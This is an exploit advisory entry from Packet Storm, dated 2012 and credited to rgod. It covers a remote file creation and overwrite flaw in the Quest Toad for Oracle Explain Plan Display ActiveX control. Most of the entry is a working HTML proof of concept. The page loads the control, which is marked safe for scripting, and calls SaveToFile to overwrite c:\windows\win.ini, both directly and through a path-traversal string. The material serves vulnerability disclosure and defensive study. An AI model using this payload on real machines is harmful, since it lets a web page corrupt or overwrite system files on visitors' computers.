Quest Toad For Oracle Explain Plan Display File Creation / Overwrite

2012-04-06T00:00:00
ID PACKETSTORM:111632
Type packetstorm
Reporter rgod
Modified 2012-04-06T00:00:00

Description

                                        
                                            `<!--   
Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115)  
Remote File Creation / Overwrite   
  
vendor site: http://www.quest.com/  
file tested: Quest_Toad-Development-Suite-for-Oracle_110R2.exe  
  
CLSID: {F7014877-6F5A-4019-A3B2-74077F2AE126}  
Progid: QExplain2.ExplainPlanDisplayX  
Binary Path: C:\PROGRA~1\COMMON~1\QUESTS~1\QEXPLA~1.DLL  
Implements IObjectSafety: True  
Safe For Initialization (IObjectSafety): True  
Safe For Scripting (IObjectSafety): True  
  
rgod  
-->  
<!-- saved from url=(0014)about:internet -->   
<html>  
<object classid='clsid:F7014877-6F5A-4019-A3B2-74077F2AE126' id='obj' width=640 height=480 />  
</object>  
<script>  
try{  
obj.SaveToFile("c:\\windows\\win.ini");  
}catch(e){  
}  
  
try{  
obj.SaveToFile("../../../../../../../../../../windows/win.ini");  
}catch(e){  
}  
</script>  
  
original url: http://retrogod.altervista.org/9sg_quest_toad_poc.htm  
`